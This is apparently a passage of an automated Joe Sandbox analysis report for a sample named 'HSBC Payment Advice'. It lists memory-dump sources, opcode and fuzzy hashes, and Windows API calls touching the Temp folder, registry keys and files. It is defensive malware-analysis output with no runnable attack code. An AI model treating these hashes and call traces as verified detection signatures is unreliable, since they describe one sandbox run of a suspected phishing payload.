          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00403345
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Char$Next$CreateDirectoryPrev
          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
          • API String ID: 4115351271-2414109610
          • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
          • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
          • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
          • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
          • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
          • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
          • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
          • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
          • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
          • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
          • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
          • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
          • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
          • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
          • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
          • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
          • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
          • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
          • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
          • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
          • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
          • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
          • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
          • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
          • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
          APIs
            • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
          • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Enum$CloseOpenValue
          • String ID:
          • API String ID: 167947723-0
          • Opcode ID: c2db8032390079b76bb5d25788585a9355f625a80f00ae826b435f508ff84699
          • Instruction ID: 196cef28da363d1279e483bf9a38a563a29f189f24dbcf66659da751fa440e39
          • Opcode Fuzzy Hash: c2db8032390079b76bb5d25788585a9355f625a80f00ae826b435f508ff84699
          • Instruction Fuzzy Hash: 87F0D1B1A04205ABE7108F65DE88ABF766CEF40358F60443EF405B21C0D6B85D419B6A
          APIs
          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
          • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
          • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
          • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
          APIs
            • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
          • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CloseDeleteOpenValue
          • String ID:
          • API String ID: 849931509-0
          • Opcode ID: bde92a3829f5d0e0bdaac5b37758bb40a9fa5cdea16ab7bc8ccfb867e66faa79
          • Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
          • Opcode Fuzzy Hash: bde92a3829f5d0e0bdaac5b37758bb40a9fa5cdea16ab7bc8ccfb867e66faa79
          • Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A
          APIs
          • OleInitialize.OLE32(00000000), ref: 00405275
            • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
          • CoUninitialize.COMBASE(00000404,00000000), ref: 004052C1
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: InitializeMessageSendUninitialize
          • String ID:
          • API String ID: 2896919175-0
          • Opcode ID: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
          • Instruction ID: 554e103746b9e2db7aaf45f87dc76b5a043826cfff103a1ab0517efa01412f9c
          • Opcode Fuzzy Hash: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
          • Instruction Fuzzy Hash: 8FF090B6645600EBF62157549D05B677364EFE0300F1948BEEE44B22A1D7794C428F6D
          APIs
          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
          • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Window$EnableShow
          • String ID:
          • API String ID: 1136574915-0
          • Opcode ID: 4ab024c76fce48d64a04f4b80c9cd3d170a2f863ee883f07f8fb81d3241bb0e0
          • Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
          • Opcode Fuzzy Hash: 4ab024c76fce48d64a04f4b80c9cd3d170a2f863ee883f07f8fb81d3241bb0e0
          • Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E
          APIs
          • GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: File$AttributesCreate
          • String ID:
          • API String ID: 415043291-0
          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
          APIs
          • GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
          • Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
          • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
          • Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6
          APIs
          • CloseHandle.KERNEL32(FFFFFFFF,76703420,0040361F,?), ref: 004037D2
          • CloseHandle.KERNEL32(FFFFFFFF,76703420,0040361F,?), ref: 004037E6
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CloseHandle
          • String ID:
          • API String ID: 2962429428-0
          • Opcode ID: ab6a5afdb87e4546ab9a70bea03761153ae091f709c166c5aceb8cc45ee36402
          • Instruction ID: 014ad41fc67124fc33d83177a1a498160c1112af25a74f466a95d4f42f1eb783
          • Opcode Fuzzy Hash: ab6a5afdb87e4546ab9a70bea03761153ae091f709c166c5aceb8cc45ee36402
          • Instruction Fuzzy Hash: E2E0867150461096C5346F7CAD85D453A185B41336B20C722F078F35F1C338AD865EAC
          APIs
          • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Open
          • String ID:
          • API String ID: 71445658-0
          • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
          • Instruction ID: e3df8b11752b843856ad965a2913e8001498b25c252565f1a48e325e263545e5
          • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
          • Instruction Fuzzy Hash: 88E04F76280108BADB00DFA4ED46E9577ECEB14701F004425B608D6091C674E5008768
          APIs
          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: FileRead
          • String ID:
          • API String ID: 2738559852-0
          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
          • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
          • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
          APIs
          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
          • Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
          • Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
          • Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D
          APIs
          • SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
          • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
          • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
          • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
          APIs
          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: FilePointer
          • String ID:
          • API String ID: 973152223-0
          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
          APIs
          • KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CallbackDispatcherUser
          • String ID:
          • API String ID: 2492992576-0
          • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
          • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
          • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
          • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69
          APIs
          • GetDlgItem.USER32(?,000003F9), ref: 00404B26
          • GetDlgItem.USER32(?,00000408), ref: 00404B31
          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
          • LoadBitmapW.USER32(0000006E), ref: 00404B8E
          • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
          • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
